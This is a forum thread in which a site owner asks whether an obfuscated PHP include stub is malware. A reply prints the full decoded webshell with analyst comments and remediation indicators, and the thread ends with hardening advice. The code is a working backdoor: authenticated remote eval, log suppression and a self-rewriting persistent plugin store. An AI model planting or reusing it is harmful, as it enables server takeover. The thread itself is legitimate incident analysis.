Anton Dyrkov, 2018-03-10 14:49:56

Is it a virus code or not?

If you decode this code, it refers to favicon.ico, but when disinfecting the site I deleted such files (with who knows what written inside them) as viruses.

<?php
/*72aa5*/

// Injected loader stub (analysis note). The hex-escaped string is an absolute
// filesystem path ending in `netcat/modules/filemanager/favicon_5e2eff.ico`;
// the `\xNN` escapes only hide the path from a casual grep, PHP resolves them
// at runtime. An error-suppressed `@include` of a file with a non-PHP
// extension is a classic webshell loader pattern: the .ico file is the real
// payload, this stub just pulls it into every page load.
// On-disk indicator: the `/*72aa5*/` marker pair brackets the injected lines.
@include "\x2fv\x61r\x2fw\x77w\x2fv\x61r\x6ea\x76a\x5fv\x79k\x73a\x72f\x2fd\x61t\x61/\x77w\x77/\x78n\x2d-\x2d-\x37s\x62a\x61b\x68c\x636\x65y\x616\x61t\x32k\x2ex\x6e-\x2dp\x31a\x69/\x6ee\x74c\x61t\x2fm\x6fd\x75l\x65s\x2ff\x69l\x65m\x61n\x61g\x65r\x2ff\x61v\x69c\x6fn\x5f5\x652\x65f\x66.\x69c\x6f";

/*72aa5*/


// Presumably the original front page was moved aside as `index.html.bak.bak`
// and is echoed here so the site keeps rendering normally after the injection
// (inferred from the filename — confirm against the site's file history).
echo file_get_contents('index.html.bak.bak');

Rsa97, 2018-03-10
@kavi4

Open this .ico file in a text editor — the malware is sitting right there.

Decoded, it reads:
// --- Decoded backdoor, part 1: environment setup ---
// Turns off error logging and reporting and removes execution-time limits so
// the shell neither surfaces in the PHP error log nor gets killed by a
// timeout. Every call is `@`-suppressed so a hardened host that forbids
// ini_set() does not produce a visible warning either.
// Remediation note: because the same code is also embedded in other files
// (see the `@include` stub in index.php), remove every copy — search the
// webroot for `ALREADY_RUN_` and `cs_auth` — and restore from known-good source.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);


// Polyfills for very old PHP builds where these constants are undefined;
// the shell is written to run on as many hosts as possible.
if(!defined("PHP_EOL"))
{
    define("PHP_EOL", "\n");
}

if(!defined("DIRECTORY_SEPARATOR"))
{
    define("DIRECTORY_SEPARATOR", "/");
}

// Run-once guard so the body is not executed twice if the file is included
// from several places. The constant name doubles as a fingerprint of this
// sample: grepping the webroot for `ALREADY_RUN_` finds every copy.
if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
    define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

    // Filled from the request later (see the $_COOKIE / $_POST loops).
    $data = NULL;
    $data_key = NULL;

    // Shared secret baked into the sample. It is used both as the second XOR
    // layer in cs_decrypt()/cs_encrypt() and as the value a request must
    // present in 'ak' to be accepted. The literal is a searchable indicator
    // of this specific deployment.
    $GLOBALS['cs_auth'] = '58d0af46-4572-4890-a372-475116d44415';
    global $cs_auth;


    // Hand-rolled base64 decoder: same alphabet as the builtin (A-Z a-z 0-9 + /,
    // '=' at index 64 marks padding). Re-implementing it avoids the string
    // "base64_decode" appearing anywhere in the file — presumably a signature
    // evasion measure rather than a functional need.
    // Returns "" for inputs shorter than one 4-character group.
    function cs_base64_decode($input) {

        if (strlen($input) < 4)
        {
            return "";
        }

        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

        // Character -> 6-bit value lookup table.
        $keys = str_split($keyStr);
        $keys = array_flip($keys);

        $i = 0;
        $output = "";

        // Drop anything outside the base64 alphabet (whitespace, line breaks).
        $input = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $input);

        // Each group of four 6-bit symbols yields up to three bytes; the 2nd
        // and 3rd byte are omitted when the matching symbol is '=' (value 64).
        do {
            $enc1 = $keys[$input[$i++]];
            $enc2 = $keys[$input[$i++]];
            $enc3 = $keys[$input[$i++]];
            $enc4 = $keys[$input[$i++]];

            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 & 3) << 6) | $enc4;
            $output = $output . chr($chr1);
            if ($enc3 != 64) {
                $output = $output . chr($chr2);
            }
            if ($enc4 != 64) {
                $output = $output . chr($chr3);
            }
        } while ($i < strlen($input));
        return $output;
    }

    // Polyfill for hosts whose PHP predates file_put_contents() (PHP < 5).
    // Needed because cs_set_plugin_config() writes the plugin store back into
    // this file. `$flag == 8` mirrors the FILE_APPEND flag value; anything
    // else truncates. Returns 0 when the file cannot be opened.
    if (!function_exists('file_put_contents'))
    {
        function file_put_contents($n, $d, $flag = False)
        {
            $mode = $flag == 8 ? 'a' : 'w';
            $f = @fopen($n, $mode);
            if ($f === False)
            {
                return 0;
            }
            else
            {
                // Array input is joined without a separator, like the builtin.
                if (is_array($d)) $d = implode($d);
                $bytes_written = fwrite($f, $d);
                fclose($f);
                return $bytes_written;
            }
        }
    }

    // Polyfill for hosts without file_get_contents(); used to read this file's
    // own contents when locating the embedded plugin store. No error handling:
    // fopen()/filesize() failures are simply swallowed by the global
    // error_reporting(0) set at the top.
    if (!function_exists('file_get_contents'))
    {
        function file_get_contents($filename)
        {
            $fhandle = fopen($filename, "r");
            $fcontents = fread($fhandle, filesize($filename));
            fclose($fhandle);

            return $fcontents;
        }
    }
    // Returns the path of the file hosting this code. In a double-quoted
    // string `\$` is a literal `$`, so the pattern is `/\(.*$/`: everything
    // from the first '(' to the end of __FILE__ is removed. That matches the
    // `/path/file.php(N) : eval()'d code` form __FILE__ takes inside eval(),
    // so the real host file is recovered even when this code was eval'd —
    // which is the file the plugin store is written back into.
    function cs_get_current_filepath()
    {
        return trim(preg_replace("/\(.*\$/", '', __FILE__));
    }

    // Repeating-key XOR of $data with $key (byte i of the output is
    // data[i] ^ key[i mod strlen(key)]). Despite the name this is symmetric:
    // the same call both "encrypts" and "decrypts". This is obfuscation, not
    // cryptography — it exists to keep payloads out of plain-text log greps.
    function cs_decrypt_phase($data, $key)
    {
        $out_data = "";

        // The inner loop advances $i; the outer loop only restarts the key.
        for ($i=0; $i<strlen($data);)
        {
            for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
            {
                $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
            }
        }

        return $out_data;
    }

    // Two-layer XOR: first with the per-request $key, then with the
    // hard-coded $cs_auth secret. Without knowing $cs_auth a request payload
    // cannot be produced, which is what ties this shell to its operator.
    function cs_decrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
    }
    // Inverse of cs_decrypt(): XOR layers applied in the opposite order
    // ($cs_auth first, then $key). Used when the plugin store is written
    // back into this file.
    function cs_encrypt($data, $key)
    {
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
    }

    // Loads the persistent "plugin" store that this shell keeps inside its own
    // host file. The store is located by searching the file's contents for
    // md5(<own path>) — a 32-hex marker — and everything after the marker is
    // url-decoded, XOR-decoded with that same md5 as key, and unserialized.
    // Returns an array name => PHP source, or an empty array if no store
    // is present yet. Because the marker is derived from the path, the store
    // silently stops loading if the file is moved — worth knowing during
    // forensic copying: analyse the file at its original path.
    function cs_get_plugin_config()
    {
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
        {
            // +32 skips the md5 marker itself.
            $config = substr($self_content, $config_pos + 32);
            $plugins = @unserialize(cs_decrypt(rawurldecode($config), md5(cs_get_current_filepath())));
        }
        else
        {
            $plugins = Array();
        }

        return $plugins;
    }

    // Writes the plugin store back into this file. On first use it appends a
    // line of the form `//<md5(path)><url-encoded blob>` so the store parses
    // as a PHP comment; afterwards the existing blob is replaced in place.
    // This is the "comment line at the end" of the sample and the reason the
    // infected file must be treated as self-modifying: its hash changes every
    // time a plugin is added or removed. On-disk indicator: a trailing `//`
    // line holding 32 hex chars followed by a long url-encoded string.
    function cs_set_plugin_config($plugins)
    {
        $config_enc = rawurlencode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
        {
            // Replace the old blob (everything after the marker) with the new one.
            $config_old = substr($self_content, $config_pos + 32);
            $self_content = str_replace($config_old, $config_enc, $self_content);

        }
        else
        {
            $self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
        }

        // Requires the web server to have write access to its own code —
        // the mitigation the second answer describes (read-only webroot)
        // breaks this persistence mechanism outright.
        @file_put_contents(cs_get_current_filepath(), $self_content);
    }

    // Stores a new plugin: $base64_data is decoded and kept as PHP source
    // under $name. It is not executed here; cs_plugin_load() eval()s it on
    // subsequent requests.
    function cs_plugin_add($name, $base64_data)
    {
        $plugins = cs_get_plugin_config();

        $plugins[$name] = cs_base64_decode($base64_data);

        cs_set_plugin_config($plugins);
    }

    // Removes the plugin stored under $name and rewrites the store.
    // Removing a non-existent name is a no-op apart from the file rewrite.
    function cs_plugin_rem($name)
    {
        $plugins = cs_get_plugin_config();

        unset($plugins[$name]);

        cs_set_plugin_config($plugins);
    }

    // Executes stored plugins with eval(): all of them when $name is NULL,
    // otherwise only the one whose name matches exactly. Called at the end of
    // every request that is not a command, so anything placed in the store
    // runs on every page view — this is the persistence layer, and it means
    // deleting the loader is not enough: the store inside this file is the
    // part that keeps running.
    function cs_plugin_load($name=NULL)
    {
        foreach (cs_get_plugin_config() as $pname=>$pcontent)
        {
            if ($name)
            {
                if (strcmp($name, $pname) == 0)
                {
                    eval($pcontent);
                    break;
                }
            }
            else
            {
                eval($pcontent);
            }
        }
    }

    // --- Command channel ---
    // The payload is whatever cookie is iterated last (or, failing that, the
    // last POST field); the cookie/field name is used as the first XOR key.
    // Since the name is chosen per request there is no fixed parameter to
    // match on — detection has to rely on the decoded body (a serialized PHP
    // array) or on the response shape noted below, not on a known cookie name.
    foreach ($_COOKIE as $key=>$value)
    {
        $data = $value;
        $data_key = $key;
    }

    if (!$data)
    {
        foreach ($_POST as $key=>$value)
        {
            $data = $value;
            $data_key = $key;
        }
    }

    // Decode chain: base64 -> XOR(name) -> XOR(cs_auth) -> unserialize.
    // Runs on every request; with no input $data is NULL and unserialize()
    // simply fails under the global error suppression.
    $data = @unserialize(cs_decrypt(cs_base64_decode($data), $data_key));

    // Authentication: the decoded array must carry the shared secret in 'ak'.
    if (isset($data['ak']) && $cs_auth==$data['ak'])
    {
        if ($data['a'] == 'i')
        {
            // 'i' = info: reports the PHP version and the shell's own version
            // string '2.0-1' (useful for family attribution of the sample).
            $i = Array(
                'pv' => @phpversion(),
                'sv' => '2.0-1',
                'ak' => $data['ak'],
            );
            echo @serialize($i);
            exit;
        }
        elseif ($data['a'] == 'e')
        {
            // 'e' = execute: eval() of request-supplied PHP. This is the
            // remote code execution primitive of the shell.
            eval($data['d']);
        }
        elseif ($data['a'] == 'plugin')
        {
            // 'plugin' = manage the persistent payload store inside this file.
            if($data['sa'] == 'add')
            {
                cs_plugin_add($data['p'], $data['d']);
            }
            elseif($data['sa'] == 'rem')
            {
                cs_plugin_rem($data['p']);
            }
        }
        // Acknowledgement: the response body is the bare auth key. A page that
        // answers a request with nothing but this UUID is a strong indicator
        // in access logs / proxy captures (look for tiny responses to normal
        // page URLs).
        echo $data['ak'];
        exit();
    }

    // Ordinary (non-command) requests: eval() every stored plugin. This is
    // what the answer means by "the comment line at the end of the code is
    // the plugins that it loads".
    cs_plugin_load();
}

And the comment line at the end of the code holds the plugins that it loads.

Lazy @BojackHorseman PHP, 2018-03-10

omg! Yes — put the site's source code under a version control system, and then you can check for and roll back all the stray changes with one command!
And if you also forbid the web server from writing to any folders except the ones you personally allow, you will never have to ask such a stupid question at all.
